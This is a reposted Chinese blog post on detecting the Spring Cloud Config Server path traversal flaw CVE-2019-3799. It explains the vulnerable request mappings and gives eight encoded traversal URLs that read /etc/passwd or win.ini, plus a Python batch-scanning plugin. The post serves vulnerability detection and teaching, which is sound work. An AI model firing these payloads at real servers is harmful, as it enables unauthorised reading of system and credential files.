编写Spring Cloud Config Server路径穿越漏洞全面检测脚本

栏目: Java · 发布时间: 5年前

内容简介:Spring Cloud Config Server路径穿越漏洞(CVE-2019-3799)的分析文章已经很多了,这里我不在画蛇填足。在分析该漏洞之后,发现了一些小细节,感觉对该漏洞检测还是挺有帮助的。基于发现的这些细节,我们来构造适应各种场景,甚至各种奇葩场景的批量检测脚本!Spring cloud config 分客户端和服务端。服务端供客户端查询配置,本次漏洞就是出在服务端。当客户端提交的访问配置请求,会在服务端被解析为以下2种:

Spring Cloud Config Server路径穿越漏洞(CVE-2019-3799)的分析文章已经很多了,这里我不在画蛇填足。在分析该漏洞之后,发现了一些小细节,感觉对该漏洞检测还是挺有帮助的。基于发现的这些细节,我们来构造适应各种场景,甚至各种奇葩场景的批量检测脚本!

0x01 简洁原理

Spring cloud config 分客户端和服务端。服务端供客户端查询配置,本次漏洞就是出在服务端。

当客户端提交的访问配置请求,会在服务端被解析为以下2种:

配置文件保存在服务端系统临时文件 {system_tmp_path} 下。在需要获取目标配置文件绝对路径时,服务端会将客户端提供的相对路径 {path} 和系统临时文件目录 {system_tmp_path} 进行拼接。

config_file_path = {system_tmp_path} + {path}

由于 {path} 客户端可控且未过滤 ../ ,从而导致目录穿越,可读服务端机器上任意文件!

0x02 漏洞检测点

经过分析代码,可以发现,其实该漏洞有三个检查点。不过网上大多数文章提供的漏洞url只是第一处。

编写Spring Cloud Config Server路径穿越漏洞全面检测脚本

编写Spring Cloud Config Server路径穿越漏洞全面检测脚本

我们先看看第一处 @RequestMapping

@RequestMapping("/{name}/{profile}/{label}/**")

这里需要注意的是程序中默认 labelmaster ,在获取配置过程中,会对该值进行校验,故这里其值需要设置为 master ,而 nameprofile 可以任意。由此我们可以构造如下url,即可匹配到该 @RequestMapping

http://xxx:8888/aaa/bbb/master/{payload}

我们接着来看第二处 @RequestMapping

@RequestMapping(value = "/{name}/{profile}/**", params = "useDefaultLabel")

根据Spring的RequestMapping匹配规则我们很容易构造以下url

http://xxx.com:8888/aaa/bbb/{payload}?useDefaultLabel=1

实际上我们构造的url虽然会被该 @RequestMapping 匹配到,但并不会执行该注解处代码。而是执行了以下注解处代码。

//org/springframework/cloud/config/server/environment/EnvironmentController.java
@RequestMapping("/{name}/{profiles}/{label:.*}")
public Environment labelled(...){
	...
}

这是因为我们构造的url,都符合两处注解的匹配规则,但后者匹配度更好优先级更高( * 优先级大于 ** ),自然优先被框架用于处理请求了。

因此我们可以构造以下链接,让第一个注解匹配度最高,使得程序使用存在漏洞带方法来处理。

http://xxx.com:8888/aaa/bbb/ccc/{payload}?useDefaultLabel=1

第三处,和第一处构造的url一样的,需要在数据包Accept头加入 application/octet-stream 即可触发!

编写Spring Cloud Config Server路径穿越漏洞全面检测脚本

0x03 目标操作系统

在黑盒渗透测试时,无法确定目标系统是Windows还是Linux,故最稳妥的方法是构造适合两者的payload,都检测一篇。

  • Linux下读 /etc/passwd ,检查关键字为 root:
  • Window下读 c:/Windows/win.ini ,检查关键字为 [extensions]

注意: 在Windows下该漏洞无法跨盘符读文件,也就是只能读和系统临时文件夹同盘符的任意路径下任意文件。 所以在Windwos系统下,系统临时文件路径被修改(这种情况比较少),即使目标存在漏洞,我们的payload也无法检测的,目前暂时没有好的解决方案。

0x04 ..%25F的个数

..%252F../ 的两次URL编码后结果,它是路径穿越的关键,其个数取决于系统临时文件目录的深度。

3.1 默认情况

这里的默认情况是指,服务端系统临时目录采用的是默认路径。

Windows系统临时文件存储路径:
file:/C:/Users/ADMINI~1/AppData/Local/Temp/
Windows下Spring cloud config server存储配置路径:
file:/C:/Users/ADMINI~1/AppData/Local/Temp/config-repo-<randomid>/
Linux系统临时文件存储路径:
/tmp/
Linux下Spring cloud config server存储配置路径:
/tmp/config-repo-{random id}/

所以要吃掉所有配置路径,Windwos下第一处漏洞检测需要6个 ..%252F ,第二处需要7个,第三处需要6个。Linux下第一处2个,第二处需要3个,第三处需要6个。

3.2 极端情况

这里的极端情况是指,服务端系统临时目录被管理员自定义为其他路径,路径深度未知。这时我们可以估计一个最大深度50(相信不会有管理员奇葩到设置更深的目录了)

综合以上各个方面的分析,我们就可以构造出如下8个POC来检查,以应对各种情况该漏洞的检测。

http://xxx:8888/a/b/master/ + {..%252F}*2 + etc%252Fpasswd
http://xxx:8888/a/b/master/ + {..%252F}*6 + Windows%252Fwin.ini
http://xxx:8888/a/b/master/ + {..%252F}*50 + etc%252Fpasswd
http://xxx:8888/a/b/master/ + {..%252F}*50 + Windows%252Fwin.ini
http://xxx:8888/a/b/c/ + {..%252F}*3 + etc%252Fpasswd?useDefaultLabel=a
http://xxx:8888/a/b/c/ + {..%252F}*7 + Windows%252Fwin.ini?useDefaultLabel=a
http://xxx:8888/a/b/c/ + {..%252F}*50 + etc%252Fpasswd?useDefaultLabel=a
http://xxx:8888/a/b/c/ + {..%252F}*50 + Windows%252Fwin.ini?useDefaultLabel=a

0x05 批量检测脚本

下面附上我写的POC-T插件

#coding=utf-8
'''
Autor: c0ny1
Date: 2019-04-20 16:41
Description: Directory Traversal with spring-cloud-config-server(CVE-2019-3799)
Affected Pivotal Products and Versions:
	Spring Cloud Config 2.1.0 to 2.1.1
	Spring Cloud Config 2.0.0 to 2.0.3
	Spring Cloud Config 1.4.0 to 1.4.5
	Older unsupported versions are also affected
'''

import requests
from requests import ConnectionError

WIN_CHECK_KEYWORD = '[extensions]'
LINUX_CHECK_KEYWORD = 'root:'


def init_poc():
	pocs = []
	payload = '/a/b/master/' + '..%252F'*2 + 'etc%252Fpasswd'
	poc = {'payload':payload,'keyword':LINUX_CHECK_KEYWORD}
	pocs.append(poc)
	
	payload = '/a/b/master/' + '..%252F'*6 + 'Windows%252Fwin.ini'
	poc = {'payload':payload,'keyword':WIN_CHECK_KEYWORD}
	pocs.append(poc)
	
	payload = '/a/b/master/' + '..%252F'*50 + 'etc%252Fpasswd'
	poc = {'payload':payload,'keyword':LINUX_CHECK_KEYWORD}
	pocs.append(poc)
	
	payload = '/a/b/master/' + '..%252F'*50 + 'Windows%252Fwin.ini'
	poc = {'payload':payload,'keyword':WIN_CHECK_KEYWORD}
	pocs.append(poc)
	
	payload = '/a/b/c/' + '..%252F'*3 + 'etc%252Fpasswd?useDefaultLabel=a'
	poc = {'payload':payload,'keyword':LINUX_CHECK_KEYWORD}
	pocs.append(poc)
	
	payload = '/a/b/c/' + '..%252F'*7 + 'Windows%252Fwin.ini?useDefaultLabel=a'
	poc = {'payload':payload,'keyword':WIN_CHECK_KEYWORD}
	pocs.append(poc)
	
	payload = '/a/b/c/' + '..%252F'*50 + 'etc%252Fpasswd?useDefaultLabel=a'
	poc = {'payload':payload,'keyword':LINUX_CHECK_KEYWORD}
	pocs.append(poc)
	
	payload = '/a/b/c/' + '..%252F'*50 + 'Windows%252Fwin.ini?useDefaultLabel=a'
	poc = {'payload':payload,'keyword':WIN_CHECK_KEYWORD}
	pocs.append(poc)
	return pocs

pocs = init_poc()

def poc(url):
    for p in pocs:
        url = url if not url.endswith('/') else url[0:len(url)-1] #去掉结尾/
        target_url = url + p.get('payload')
        try:
            r = requests.get(target_url,timeout=10)
        except Exception,e:
			continue
        if (r.status_code == 200) and (p.get('keyword') in r.content):
            return True
    return False

以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

黑客攻防技术宝典(第2版)

黑客攻防技术宝典(第2版)

[英] Dafydd Stuttard、[英] Marcus Pinto / 石华耀、傅志红 / 人民邮电出版社 / 2012-6-26 / 99.00元

内容简介: Web应用无处不在,安全隐患如影随形。承载着丰富功能与用途的Web应用程序中布满了各种漏洞,攻击者能够利用这些漏洞盗取用户资料,实施诈骗,破坏其他系统等。近年来,一些公司的网络系统频频遭受攻击,导致用户信息泄露,造成不良影响。因此,如何确保Web应用程序的安全,已成为摆在人们眼前亟待解决的问题。 本书是Web安全领域专家的经验结晶,系统阐述了如何针对Web应用程序展开攻击与......一起来看看 《黑客攻防技术宝典(第2版)》 这本书的介绍吧!

XML、JSON 在线转换
XML、JSON 在线转换

在线XML、JSON转换工具

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器

HEX CMYK 转换工具
HEX CMYK 转换工具

HEX CMYK 互转工具